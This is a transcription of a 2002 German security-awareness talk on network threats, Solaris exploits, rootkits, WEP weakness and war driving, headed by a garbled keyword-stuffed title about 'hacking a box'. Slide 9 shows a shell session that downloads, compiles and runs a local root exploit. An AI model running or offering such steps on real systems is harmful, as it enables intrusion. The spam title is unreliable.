How To Hack A Box Remotely (For Free) On A Pc Or Mac) On Pc Or Ipad (For A Free Download) On Your Computer Or Mac (For Cheap) On The Pc Or Pc (Forfree) On An Ipad

Transcription

1 We are under attack, aren't we? Hans Schächl Senior Consultant kippdata informationstechnologie Gmbh, Bonn Security-Meeting 2002 kippdata informationstechnologie GmbH Bornheimer Straße 33a Bonn Telefon Telefax

2 Problemlage Hosts (Mio) ,7 3,2 6,6 Hosts on the Internet (Quelle: 12,8 19,5 36,7 56, ,8 162, Jahr

3 Problemlage sicherheitsrelevante Vorfälle (Quelle: an CERT/CC gemeldete Vorfälle Jahr 2002: Hochrechnung aus Q1/Q2 2002

4 Problemlage Schadensausmaß über 455 Mio US$ in 2002 bei 44% der Befragten! "For the fifth year in a row, more respondents (74%) cited their Internet connection as a frequent point of attack than cited their internal systems as a frequent point of attack (33%)" "Seventy percent of those attacked reported vandalism" (Quelle: CSI/FBI computer crime and security survey, 2002)

5 Problemlage Folgerungen noch immer hohe Dunkelziffer wachsende Wahrscheinlichkeit, als Ziel entdeckt zu werden Intention von "Angreifern" kaum vorhersagbar Angriffe werden professioneller, Tools frei verfügbar

6 Problemlage Gegenmaßnahmen Anti-Virus (98%) Firewalls (95%) physical Security (92%) Access Control (90%) IDS (61%) Encryption (53%) Digital Identification (42%) Biometrics (9%)

7 Lösung...

8 Und nun? Sicheres Gefühl?

9 Was die Firewall nicht sieht... local hacks: $ id uid=9001(foo) gid=9001(foouser) $ uname -srp SunOS 5.7 sparc $ wget $ gcc -o hackthem admtool c $./hackthem Jumping address = efffea90 # id uid=9001(foo) gid=9001(foouser) euid=0(root)

10 "Exploits" Now for the fun part! how to hack a box remotely Sun Solaris 7 Sun UltraSPARC II default Installation Apache Webserver

11 Alptraum "root compromise" Oder wie es Tripwire Inc. sagt:

12 Was geschah? login buffer overflow über telnetd Buffer Overflow in cachefsd "snmpxdmid" allows remote Root access

13 Backdoors Root-Kits der nächsten Generation Loadable Kernel Module versteckt seine eigene Anwesenheit und die anderer Prozesse, Files Trojaner / Backdoor z.b. ICMP Root Shell UDP Port 53 Tunnel HTTP Trojaner

14 Konsequenzen Patch-Management z.b. Sun Patch Manager Filter, Proxy und Wrapper für Dienste stateful Firewall, Content Scanner, tcpwrapper etc. hardened OS / RBAC Sun JASS, ARGUS, Trusted Solaris und Co. Intrusion Detection Host-based (Tripwire), Netzwerk-basiert (SmartDefense)

15 "Exploits" Ohne Worte... "windows exploits" -> hits "linux exploits" -> hits "solaris exploits" -> hits

16 "Exploits" OS out of the box werden auch immer "härter" Solaris > 30 exploits 11'1996 erscheint Phrack #49: Aleph One / "Smashing The Stack For Fun And Profit" Solaris 2.6 -> 46 exploits Solaris 7 -> 18 exploits Solaris 8 -> 2 exploits Solaris 9 -> noch 0...

17 From war dialing to... John T. Draper AKA Captain Crunch

18 ... war driving!

19 The new kid in town Wireless Insecurity und WEP Wire Equivalent Privacy isn't! rc4 ist nicht schlecht - Implementierung in WEP schon... wer montiert RJ-45-Dosen an der Fassade? es hilft zur Zeit nur VPN auf IP-Layer Verschlüsselung auf Application Layer Warten auf WEPv2 / 802.1x?

20 WEP or not - you're scanned! vortex, :"A Co-conspirator (you know who you are ;-) and I have performed initial scans (standing relatively still) in the major London financial district of Canary Wharf, and were shocked to have detected around 150 wireless devices - most of which were not even using WEP." "Shipley recently sat with a friend in his car in the Silicon Valley parking lot of <company>. They were using laptops loaded with special monitoring software to observe lots of <company>'s traffic, most of it coming from Windows machines. They were able to observe as someone transferred a file and someone else turned on an NT machine and received .""a <company> spokeswoman said later that any network heard that day was part of a <company> test, though she didn't know what was being tested, and added that the network was no longer operational."

21 ... and mapped! San Francisco Bay Area

22 ... auch in Bonn!

23 Literaturhinweise Building Internet Firewalls, Chapman und Zwicky, O'Reilly Practical Unix & Internet Security, Garfinkel und Spafford, O'Reilly Firewalls and Internet Security, Cheswick und Bellovin, Addison- Wesley TCP/IP Illustrated, W. Richard Stevens, Addison-Wesley Cracking DES, Electronic Frontier Foundation, O'Reilly Applied Cryptography, Bruce Schneier, John Wiley & Sons SSL and TLS, Eric Rescorla, Addison-Wesley Intrusion Signatures and Analysis, S. Northcutt, New Riders Pub.

24 Online-Ressourcen Sun Security Products Sun Recommended and Security Patches Sun JASS Solaris Security Toolkit CheckPoint Firewall-1 / VPN-1 Firewalls Mailing Liste Bugtraq Mailingliste Bundesamt für Sicherheit in der Informationstechnik CERT Coordination Center "The Design of a Secure Internet Gateway" v. Bill Cheswick

25 Online-Ressourcen Solaris Fingerprint Database Sun Security BluePrints Online Solaris and Tripwire Tripwire for Servers ARGUS WEP Cypherpunk Vortrag bei den Black Hat Briefings InSecurity of the WEP Algorithm Air Snort Quellen War dialing / war driving FAQ